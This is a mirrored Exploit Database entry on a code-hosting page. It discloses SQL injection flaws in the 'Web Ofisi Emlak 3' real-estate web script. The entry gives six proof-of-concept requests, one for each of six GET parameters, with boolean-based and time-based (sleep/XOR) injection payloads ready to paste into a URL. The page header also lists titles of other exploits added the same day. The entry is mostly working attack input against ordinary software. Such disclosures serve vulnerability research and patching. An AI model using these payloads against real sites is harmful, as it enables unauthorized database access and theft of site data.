bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/webapps/47142.txt
Offensive Security 7ec7ea72de DB: 2019-07-20 
10 changes to exploits/shellcodes

MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
fuelCMS 1.4.1 - Remote Code Execution
Web Ofisi E-Ticaret 3 - 'a' SQL Injection
Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection
Web Ofisi Emlak 2 - 'ara' SQL Injection
Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection
Web Ofisi Firma Rehberi 1 - 'il' SQL Injection
Web Ofisi Rent a Car 3 - 'klima' SQL Injection
Web Ofisi Firma 13 - 'oz' SQL Injection
REDCap < 9.1.2 - Cross-Site Scripting
2019-07-20 05:02:15 +00:00

50 lines
No EOL
2 KiB
Text
Raw Blame History

# Exploit Title: Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection
# Date: 2019-07-19
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v3.html
# Demo Site: http://demobul.net/emlakv3/
# Version: V2
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request:
http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
Vulnerable Parameter: emlak_durumu (GET)
Payload: -1' OR 3*2*1=6 AND 000744=000744 --
----- PoC 2: SQLi -----
Request:
http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
Vulnerable Parameter: emlak_tipi (GET)
Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
----- PoC 3: SQLi -----
Request:
http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
Vulnerable Parameter: il (GET)
Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
----- PoC 4: SQLi -----
Request:
http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
Vulnerable Parameter: ilce (GET)
Payload: -1' OR 3*2*1=6 AND 000397=000397 --
----- PoC 5: SQLi -----
Request:
http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
Vulnerable Parameter: kelime (GET)
Payload: -1' OR 3*2*1=6 AND 000397=000397 --
----- PoC 6: SQLi -----
Request:
http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
Vulnerable Parameter: semt (GET)
Payload: -1' OR 3*2*1=6 AND 000531=000531 --
Reference in a new issue View git blame Copy permalink